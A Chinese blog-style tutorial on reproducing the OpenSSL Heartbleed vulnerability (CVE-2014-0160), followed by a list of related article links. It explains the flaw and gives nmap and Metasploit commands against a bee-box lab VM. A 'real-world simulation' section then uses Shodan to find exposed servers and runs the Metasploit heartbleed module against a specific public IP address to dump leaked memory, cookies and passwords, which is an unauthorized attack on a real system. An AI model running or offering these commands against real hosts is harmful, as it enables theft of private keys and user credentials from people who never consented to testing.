漏洞范围：

OpenSSL1.0.1版本
漏洞成因：

Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容，这样一来受害者的内存内容就会以每次64KB的速度进行泄露。
漏洞危害：

如同漏洞成因所讲，我们可以通过该漏洞读取每次攻击泄露出来的信息，所以可能也可以获取到服务器的私钥，用户cookie和密码等。
漏洞复现：

环境：本次环境使用 bee-box虚拟机(已集成该漏洞环境)进行测试。
bee-box虚拟机下载：链接

1.确定目标及端口信息。这里存在漏洞的靶机端口为8443。

2.使用nmap 的脚本进行检测漏洞是否存在。

nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.224.131

由下图检测结果可以看出存在心脏滴血漏洞。

4.使用msf进行漏洞利用。
a) 打开msfconsole后，查找heartbleed模块：

#msf>search heartbleed

b) 使用第一个选项

#msf > use auxiliary/scanner/ssl/openssl_heartbleed

c) 查看需要设置哪些选项

#msf auxiliary(openssl_heartbleed) > show options

d) 这里我们需要设置RHOSTS，RPORT

e) 设置verbose，这个设置要设置成true才能看到泄露的信息

在#msf auxiliary(openssl_heartbleed) > set  verbose true
(此设置主要是为了显示整个过程以及leak出来的数据，如果没有的话只显示如下图结果)

f) exploit

#msf auxiliary(openssl_heartbleed) > exploit

g) 如果有人在正在登录该web应用的话，还可能可以直接抓到账号密码等信息。

实战模拟

使用shodan搜索相关站点
关键词：openssl/1.0.1a

随意挑取其中一个网站，然后进入以下网址进行验证：
https://possible.lv/tools/hb/

进入这个专门验证心脏滴血的网站进行验证，说明是存在心脏滴血的。

接下来我们可以使用msf进行去利用这个漏洞。

1.开启Metasploit，查找心脏滴血漏洞并利用
search openssl_heartbleed
use auxiliary/scanner/ssl/openssl_heartbleed

1. 配置源地址和源端口，IP地址为查找到的站点，端口号设为443,并执行run命令

set RHOSTS 92.154.49.106
set RPORT 443
run

Heartbeat response with leak证实的确是存在着心脏滴血的漏洞的

1. 设置verbose 为true，输出进度条记录

set VERBOSE true
exploit

注意！一定要设置verbose，这个设置要设置成true才能看到泄露的信息

可以看到返回了一系列的敏感信息

参考：https://www.jianshu.com/p/08600e2f4530

心脏滴血漏洞复现(CVE-2014-0160)相关推荐

1. “心脏滴血”漏洞复现

   "心脏滴血"简介: Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查.攻击者可以追踪OpenSSL所分配的64KB缓存.将超 ...

2. 心脏滴血漏洞利用（CVE-2014-0160）

   0x00 前置知识 心脏滴血漏洞复现(CVE-2014-0160) - 知乎 1.心脏滴血简介 心脏出血漏洞"是指openssl这个开源软件中的一个漏洞,因为该软件使用到一个叫做heartb ...

3. 【web攻防】破壳漏洞【CVE-2014-6271】与心脏滴血漏洞 【CVE-2014-0160】 docker 复现 学习过程

   其实最近的确是想更新一些文章的,但一直在忙于挖洞和挖洞技巧学习,前者肯定不能发真实案例,后者学的太零碎太杂,自己也处于一个积累的过程,发一些边边角角的内容也没意思. 虽然相比以前的确有了一点进步,但我 ...

4. 渗透测试-Openssl心脏出血漏洞复现

   心脏滴血 早在2014年,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞.在黑客社区,它被命名为"心脏出血",表明网络上出现了"致命内伤".利用该漏 ...

5. “心脏滴血漏洞”测评经验分享

   "心脏滴血漏洞"测评经验分享 1 前言 1.1 编写目的 经验分析贴,赚C币买文章: 1.2 读者对象 本文档读者对象为:测评相关工程师.项目管理者.测试工程师.质量管理人员.文档 ...

6. 一次心脏滴血漏洞的bug处理过程

   一个p2p平台,一次内部安全事件的处理过程,一个关乎投资人利益的网络投资平台,一个无知者无畏的年代.口口声声对外宣称安全.可靠.高收益.-- [步骤] 1.对应用https的系统进行ssl协议已公开漏 ...

7. 心脏滴血漏洞HeartBleed CVE-2014-0160深入代码层面的分析

   前几天有人问我你不是看过openssl吗?那聊聊openssl漏洞,当时我一脸迷茫.我说我知道著名的心脏滴血漏洞,但是具体漏洞是什么原因导致的没有回答上来.对于自诩看过openssl源码的人,我觉得有 ...

8. 心脏出血漏洞复现（CVE-2014-0160）

   心脏出血漏洞复现(CVE-2014-0160) 环境搭建 漏洞复现 参考文章 环境搭建 启动docker systemctl start docker 获取vulhub git clone --dep ...

9. 心脏滴血漏洞(CVE-2014-0160)分析与防护

   一.漏洞简介 2014年4月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBle ...

最新文章

1. 莫慌！网络推广平台更新网站SEO优化中，被K降权怎么办？
2. C语言开发windows桌面程序,开发 windows 桌面软件，现在主流用什么技术？
3. hdu 2448 Mining Station on the Sea(最短路+费用流)
4. CentOS 初体验八：传输本地文件到CentOS
5. 联想g470笔记本开vt_最“发泄”评测！飞刀铁拳暴力输出，联想本结局竟然大亮？(附视频)...
6. python-玉米（小米）商城作业
7. dubbo源码深度解析_scrapy框架通用爬虫、深度爬虫、分布式爬虫、分布式深度爬虫，源码解析及应用
8. 微商人赚钱的4个落地动作
9. android滑动基础篇 TouchView
10. 参考文献格式字号字体_参考文献标准格式字体
11. php分页类 seo,laravel 分页seo浅谈
12. 服务器端口怎么调出虚拟键盘,win10系统打开软键盘 win10怎么调出软键盘
13. three.js 实现露珠滴落动画
14. Linux 命令 技能
15. qt tableWidget 去掉网格线
16. Java基础_集合_List与Set集合（笔记）
17. pycharm设置项目编码
18. 老慜的A5作业——p5.js 动态、周期、随机、面向对象
19. java date before,Java中的LocalDate isBefore()方法
20. 多线程下载王者荣耀图片

热门文章

1. Python在图片上绘制指定半径的圆
2. 微信小程序支付 Java后端代码详解
3. 文件批量改名：如何将在不同文件夹里的文件统一命名并设置编号？
4. android studio 修改打包包名的正确方式
5. 【机器学习案例四】基于心电图的心脏病诊断（分类）
6. Gson按指定字段顺序序列化
7. 无线技巧：学会设置无线上网猫以及网卡
8. 使用Python计算化学式的相对分子质量
9. Unity如何制作道具tips随着屏幕边界自适应变换位置，确保不超出屏幕的功能
10. 极简主义的思想内核-奥卡姆剃刀原则